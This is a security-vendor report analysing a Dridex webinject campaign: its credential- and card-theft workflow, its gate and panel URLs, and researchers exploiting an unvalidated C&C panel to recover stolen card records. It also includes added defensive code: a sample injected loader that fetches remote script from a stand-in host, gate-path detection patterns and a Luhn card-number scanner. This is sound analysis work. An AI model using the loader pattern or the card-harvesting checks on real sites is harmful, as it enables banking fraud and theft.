





Analysis of Latest Dridex Campaign Reveals Worrisome Changes and Hints at New Threat Actor Involvement

In the Ponemon Institute report "2015 Cost of Cyber Crime Study: Global", the average cost of cyber fraud to a company is put at 7.7 million dollars, which again underlines the unstoppable growth of this business in recent years. The report also concludes that the financial sector is once again the sector most affected by these attacks, with average losses of almost 13.5 million dollars per company. This well-known upward trend in cybercrime is driving greater investment in security by companies. Yet this greater investment does not stop the cybercriminals: why is the return on this investment not directly proportional to a reduction in losses?

The answer to this question rests on two pillars:

• Threats are more advanced and the security paradigm has changed, so conventional solutions based on signatures or on known attacks against the company's technology assets are no longer sufficient; an additional layer of protection is needed.

• Attacks against financial institutions have shifted to compromising the end user. Almost 98% of companies acknowledge having suffered malware attacks, and 60% acknowledge having suffered phishing attacks. Most companies have no comprehensive protection solution beyond the perimeter.

The user, the weakest link

Today's society, in which anyone has electronic devices with which to do their banking conveniently and quickly, has brought about a change in the security paradigm

WebFraud Defense 1



A recent investigation conducted at buguroo Labs over the last month gives us surprising insights into the latest Dridex campaigns. In this article we are not going to cover how Dridex works, how it is spread, or which sophisticated mechanisms it uses to avoid detection and mitigation by the "good guys."

We are going to show that something is changing in how the Dridex infrastructure is being used. Suddenly and surprisingly, this ultra-sophisticated malware, which targets the most important companies around the world and turns their security upside down, also has code vulnerabilities of its own. These vulnerabilities allow us to analyze the impact of the new Dridex campaigns from a different point of view: based on the data it has stolen, not just on its detection ratio.

Key Findings

• The Dridex infrastructure is not invulnerable. Some of the gate URLs that are part of the 220 subnet can be exploited. Ultra-sophisticated malware has crude vulnerabilities.

• Analysis shows Dridex's latest campaign has added new targets to its compromise workflow. It is built to steal credit card information using an Automatic Transfer System (ATS) mechanism. From compromising users' credentials to hijacking end users' sessions in order to transfer money directly to fraudulent mule accounts, Dridex covers many options for compromising victims' data.

• In just this one subnet campaign, Dridex's panel has compromised data from more than 100 countries and holds credit card data affecting more than 900 entities. This is much more than we expected and shows a worrying increase in the malware's scope.

• Although 70 percent of the stolen credit cards recovered are associated with English-speaking issuing organizations, around 85 percent of the affected entities are located in non-English-speaking countries. The number of victims in the Middle East, Africa and Latin America is growing rapidly, so Dridex must be considered a global threat.

buguroo 2


• During one 10-week period, attackers are estimated to have launched multiple campaigns with the 220 subnet, potentially compromising more than 1 million credit cards, with approximately $100 million in estimated financial losses.

• Dridex infrastructure is being used to distribute Locky ransomware.



In January 2016, we detected several alerts from a customer that had deployed our endpoint protection mechanism, bugFraud Defense. Among those alerts, we found a victim affected by new malware that appears to be an evolution of Dridex's conventional campaigns. After analyzing that sample and probing how the malware was using its infrastructure, the webinject revealed a vulnerability in a Dridex gate URL.

With the information obtained, buguroo was able to analyze and calculate the scope of one of Dridex's new campaigns. By carefully evaluating how the cybercrime operation is organized and how Dridex is distributed through massive spam campaigns, we were able to estimate how much this attack could cost financial entities.

Webinject Static Analysis


Our bugFraud Defense solution gave us the entire JavaScript that was running in the victim's browser at our financial entity customer, which allowed us to analyze in depth what the attack consisted of. In this case, the webinject placed in the victim's browser was quite similar to others from the same malware campaign seen on the Internet: a short script that calls a remote server to download the final JavaScript, which then modifies the legitimate website's content while the victim navigates through it.
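The two-stage loader just described can be spotted on the defender side by listing which origins a captured page actually pulls script from. The block below is an added example, not code from the original report or from buguroo: it takes a constructed HTML snapshot of the kind bugFraud Defense would capture (the first-party hostnames bank.example and cdn.bank.example and the injected host stat-counter.example are assumptions) and reports every script source, whether a static src attribute or a src assigned from an inline script, whose host is not first-party.

```javascript
// Added example (not buguroo's code): flag scripts a bank page loads from
// origins other than the bank's own. The HTML and hostnames below are
// constructed for illustration; bank.example and cdn.bank.example are the
// assumed first-party origins, stat-counter.example the assumed injected host.

const FIRST_PARTY = new Set(['bank.example', 'cdn.bank.example']);

// Constructed page as a webinject would leave it: the injected loader is the
// last <script>, and it pulls the second-stage JS from a remote server.
const SAMPLE_HTML = `
<html><head>
<script src="https://cdn.bank.example/js/app.js"></script>
<script src="/js/login.js"></script>
</head><body>
<form id="login"><input name="user"><input name="pass"></form>
<script>
  var s = document.createElement('script');
  s.src = 'https://stat-counter.example/facebookapi/gate/?a=' + Math.random();
  document.head.appendChild(s);
</script>
</body></html>`;

// Hostname of an absolute URL; null for relative (same-origin) paths.
function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// Collect every script source the page would load: static <script src>
// attributes plus string literals assigned to a `.src` property inside
// inline scripts (the dynamic-loader pattern used by the webinject).
function scriptSources(html) {
  const out = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1], body = m[2];
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) out.push({ url: src[1], kind: 'static' });
    const dyn = /\.src\s*=\s*["']([^"']+)["']/g;
    let d;
    while ((d = dyn.exec(body)) !== null) out.push({ url: d[1], kind: 'dynamic' });
  }
  return out;
}

// Scripts whose host is absolute and not in the first-party allowlist.
function foreignScripts(html, firstParty) {
  return scriptSources(html).filter(s => {
    const h = hostOf(s.url);
    return h !== null && !firstParty.has(h);
  });
}

for (const s of foreignScripts(SAMPLE_HTML, FIRST_PARTY))
  console.log(`${s.kind.padEnd(7)} ${s.url}`);
```

The regex-based extraction is deliberately tolerant of broken markup, since an injected page is not guaranteed to be well-formed; in a browser extension or a DOM-capable harness the same logic can be run over document.scripts instead.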



This mechanism is known as an Automatic Transfer System (ATS). Using it lets the attackers run a service built around the creation and maintenance of updated, personalized webinjects for every target entity. The attack infrastructure is therefore more fragmented, and its mitigation increasingly difficult. This development highlights the Malware-as-a-Service concept.

However, improving the uptime, or survivability, of the attacks is not the main benefit of these mechanisms. The main benefit is advanced functionality, such as injections that interact with post-login pages. The victim cannot notice the infection or the damage it is causing and, in fact, tends to unconsciously act in the attacker's favor. The samples used in those developments are shown below to provide a better understanding of the behavior:



During our analysis period, we were able to detect three different ATS panels that were operating with Dridex malware infrastructure behavior.

Gate URL                                        Detected time
https://XXXXXXXol.name/adm/gate/                27/01/2016
https://XXXXXXXna.com/facebookapi/gate/         29/02/2016
https://smXXXXXXXXXX.com/facebookapi/gate/      09/03/2016

Source Code

After downloading the JavaScript's source code, we found that it was obfuscated, so we had to de-obfuscate and clean it in order to make it readable. We used both static and dynamic methodologies for this purpose.

























Interesting Variables

During our analysis we found several variables that helped us understand the final purpose of this JavaScript: stealing banking credentials. The most important ones are listed below:

• gateURL: URL path of the gate. It is the drop zone to which the JavaScript sends compromised data, and it is also used to retrieve data the malware needs in order to function.

• adminka_path: URL path of the command and control panel. It is where the botnet administrator logs in to review the data (https://*****.***/adm/).

• bank_id, bank_folder_name: affected entity.

• account_id: stolen account ID.

• transfer_info, all_transfers_info: all information related to account transfers.

• mob_info: mobile-related information. It could be used to bypass second-factor authentication.

• login_node, pass_node: user credentials.

Variable initialization
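The gate and panel paths seen in this campaign (/adm/gate/ and /facebookapi/gate/ for the drop zone, /adm/ for the panel behind adminka_path) are usable as indicators in web-proxy logs. The following is an added example, not code from the original report: it parses constructed proxy log lines in an assumed "<timestamp> <client-ip> <method> <url> <status>" format (all hostnames are invented), tags POSTs to a gate path as exfiltration and GETs as configuration fetches, flags requests to /adm/ as panel access, and lists the clients that actually posted data.

```javascript
// Added example (not buguroo's code): scan web-proxy log lines for requests
// whose URL path follows the gate/panel layout seen in this campaign:
// /adm/gate/ and /facebookapi/gate/ for the drop zone, /adm/ for the panel.
// The log format "<timestamp> <client-ip> <method> <url> <status>" and all
// hostnames below are assumptions, constructed for this example.

const GATE_PATH = /\/(?:adm|facebookapi)\/gate\/?$/i;
const PANEL_PATH = /\/adm\/?$/i;

// Constructed proxy log: one victim (10.0.0.21) posting to a gate and then
// fetching from it, a legitimate banking request, and one panel login.
const SAMPLE_LOG = [
  '2016-03-09T10:14:02Z 10.0.0.21 GET https://www.bank.example/login 200',
  '2016-03-09T10:14:05Z 10.0.0.21 POST https://sm-constructed.example/facebookapi/gate/ 200',
  '2016-03-09T10:15:10Z 10.0.0.21 GET https://sm-constructed.example/facebookapi/gate/?id=42 200',
  '2016-03-09T10:16:00Z 10.0.0.33 POST https://www.bank.example/api/transfer 200',
  '2016-03-09T10:17:44Z 10.0.0.40 GET https://constructed-ol.example/adm/ 200',
  'garbage line that should not crash the parser',
];

// Split one log line into its fields; return null for anything unparseable
// so a single malformed line never aborts the scan.
function parseLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 5) return null;
  const [ts, client, method, url, status] = parts;
  let parsed;
  try { parsed = new URL(url); } catch { return null; }
  return { ts, client, method: method.toUpperCase(), url: parsed, status };
}

// Tag a request by path: a POST to a gate carries stolen data, a GET from it
// fetches the injection's configuration, and /adm/ is the operator's panel.
function classify(req) {
  const path = req.url.pathname;
  if (GATE_PATH.test(path)) return req.method === 'POST' ? 'gate-exfil' : 'gate-fetch';
  if (PANEL_PATH.test(path)) return 'panel';
  return null;
}

function findSuspicious(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    const tag = classify(req);
    if (tag) hits.push({ tag, ts: req.ts, client: req.client,
                         host: req.url.hostname, path: req.url.pathname });
  }
  return hits;
}

// Clients that actually posted to a gate are the ones with an active webinject.
function clientsExfiltrating(hits) {
  return new Set(hits.filter(h => h.tag === 'gate-exfil').map(h => h.client));
}

for (const h of findSuspicious(SAMPLE_LOG))
  console.log(`${h.ts} ${h.client} ${h.tag.padEnd(10)} ${h.host}${h.path}`);
```

Path-based matching is only a starting point: the operators can rename the gate directory at will, so in practice the hit list should be joined against the hostnames seen in the ATS panel table above and reviewed before blocking.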



Interesting Functions

Having analyzed all of the code, we can confirm that it was written by professional developers: it contains more than 8,000 lines, including more than 100 functions with specific purposes. Among the features included in this extensive code are functions that:

• Modify HTML content and display it to the end user

• Parse and validate user credentials

• Connect to the Gate server

• Check the different protection mechanisms deployed by each target entity

• Manage and follow the bot workflow in a simple way

Examples of functions



Webinject Behavior

This campaign's webinject is able to interact with the financial entity's site by hijacking the victim's browser. The workflow the JS follows is:

1. First, it initializes and replaces the variables holding the Gate URL and the C&C URL; both are needed for the subsequent communication.

2. Secondly, the JS checks whether the victim is browsing the targeted entity's login page.

3. If so, the JS modifies the HTML in order to steal the user's credentials.

4. If not, the JS shows an HTML page to keep the user waiting while it checks whether the victim is on the Main Page or on the Account Details Page.

a. Main Page behavior: the JS steals the account balance and holder name. It also logs the internal status and account number, and performs checks in order to abort or continue the execution workflow.

b. Account Details Page behavior: first, the JS parses the website looking for personal information. Depending on the user's status, the JS can also display an HTML form requesting the victim's personal data or their credit card data. All the information gathered is sent to the previously configured gate URL.

5. Finally, it checks whether the compromised data is fake: the JS can verify credit card numbers with the Luhn algorithm, among other checks.
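Step 5 is the part of the workflow most easily reproduced. The block below is an added example, not the webinject's own code: a Luhn (mod 10) check of the kind used to discard fake card numbers, a filter for obviously fabricated digit strings, and a scanner that applies both to a constructed POST body of the kind the gate would receive. The same check lets a defender flag Luhn-valid numbers in outbound form data bound for an unexpected host. The field names and card numbers are constructed; 4111111111111111 and 4242424242424242 are the standard Luhn-valid test numbers.

```javascript
// Added example (not buguroo's code): Luhn validation as described in step 5,
// plus a scanner that applies it to a captured POST body. Field names and
// card numbers are constructed; 4111... and 4242... are the usual Luhn-valid
// test numbers, not real cards.

// Luhn (mod 10): from the rightmost digit, double every second digit,
// subtract 9 from any result above 9, and require the sum to be 0 mod 10.
function luhnValid(candidate) {
  const digits = String(candidate).replace(/[\s-]/g, '');
  if (!/^\d{12,19}$/.test(digits)) return false;
  let sum = 0, doubleIt = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (doubleIt) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    doubleIt = !doubleIt;
  }
  return sum % 10 === 0;
}

// Reject input a victim might type just to get past the form: all digits
// identical (0000... passes Luhn) or a plain ascending run.
function looksFake(digits) {
  return /^(\d)\1+$/.test(digits) || '1234567890123456789'.startsWith(digits);
}

function cardStatus(candidate) {
  const digits = String(candidate).replace(/[\s-]/g, '');
  if (!luhnValid(digits)) return 'invalid';
  if (looksFake(digits)) return 'fake';
  return 'plausible';
}

// Pull every 12-19 digit run (spaces or dashes allowed between digits) out
// of a text blob and keep only the plausible card numbers.
function findCards(text) {
  const re = /\b(?:\d[ -]?){11,18}\d\b/g;
  const found = [];
  let m;
  while ((m = re.exec(text)) !== null) {
    const digits = m[0].replace(/[ -]/g, '');
    if (cardStatus(digits) === 'plausible') found.push(digits);
  }
  return found;
}

// Constructed POST body using the variable names seen in the webinject:
// one real-looking card, one Luhn-invalid number, one all-zero fake.
const SAMPLE_POST_BODY =
  'bank_id=17&account_id=00123456789&login_node=jdoe' +
  '&cc=4111 1111 1111 1111&cc2=4111111111111112' +
  '&cc3=0000000000000000&phone=600123456';

console.log(findCards(SAMPLE_POST_BODY));
```

On the defensive side the scanner is intentionally strict (Luhn-valid and not a trivial pattern) so that account numbers and phone numbers in the same form post do not trigger it; a production DLP rule would add issuer-prefix and length checks per card brand.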




Compromised Data from the C&C Panel

After the research triggered by our first JS detection, we found where the C&C login panel was hosted. It appears as in the image below.

Using this information together with the findings from our JavaScript analysis and a search of the Intel Big Data from buguroo Labs, we noticed some coincidences between this panel and others we had already detected in the past.

Looking deeper into the panel responses, we found that this panel version was vulnerable, and we were able to recover part of the compromised data.

Discovering the Vulnerability

By testing how the panel responded to some of our requests and matching this with what we had learned from the JavaScript code, we found that many request variables were not subject to any validation mechanism. This allowed us to recover most of the victims' data.




Server response with internal data

Analyzing Recovered Data

The recovered information has a specific structure that matches exactly the content requested by the attackers' HTML forms:

• Account
• Holder name
• Last login date
• Card number
  o Card country
  o Card bank
  o Card type

After analyzing the data in its entirety, we came to the following conclusions:

1. There is an increase in victims around the world. European and English-speaking countries are still the main targets, but it is significant to find credit cards related to African and Latin American companies.



2. After processing all the data contained in the attackers' web panel, we were able to recover around 16,000 unique credit card records. While this may not seem like a huge amount, we need to consider that this is just one part of just one Dridex campaign. As stated in the "Dridex: Tidal waves of spam pushing dangerous financial Trojan" report from Symantec, during the same 10-week period 145 different Dridex campaigns were found, and nearly 40 percent of them were related to the 220 subnet. This approximation allows us to estimate the global take of the Dridex 220 subnet at around $20 million in profits in just a 10-week period, assuming that one out of 10 credit cards works and can be used by the attackers, and taking $500 as the average amount stolen per account.




It is quite rare to find ultra-sophisticated malware like Dridex using foreign infrastructure that can be compromised easily, allowing anyone to get at the data the malware has exfiltrated. This supports the hypothesis that, after October's takedown, Dridex malware is being used by different cyberattacker groups that are not necessarily the ones who developed the first Dridex versions.



It also matches a pattern we have seen in other cases such as Dyre: cyberattacker groups evolve their strategies as their product lifecycle matures. First, they create new malware and use it themselves. After some time, they sell it to other groups on the black markets. Eventually, those others share or leak the code to the underground community.

This raises interesting possibilities. Is Dridex now being used by less professional groups, as suggested by the exceedingly rare vulnerability of a C&C server to a basic attack? Is Dridex going to be the next massively accessible malware, as Zeus was in the past?

At the moment, two things are clear. The Dridex infrastructure is ramping up its targeting of credit card and financial data, and it is being used to massively distribute a new threat: Locky ransomware.

About buguroo

buguroo is a company of bug gurus redefining cybersecurity with a series

of recently announced next-generation IT security platforms. A U.S. startup

and spinoff of Deloitte’s European Security Operations Center (SOC), the

company introduced bugThreats, a threat intelligence platform (TIP)

that uses aggressive techniques to hack the hackers and mine relevant

threat data from the Dark Web and the surface Web to deliver actionable



• David García Muñoz

• José Carlos Corrales Casas


• Elisabet Fernández Cerro





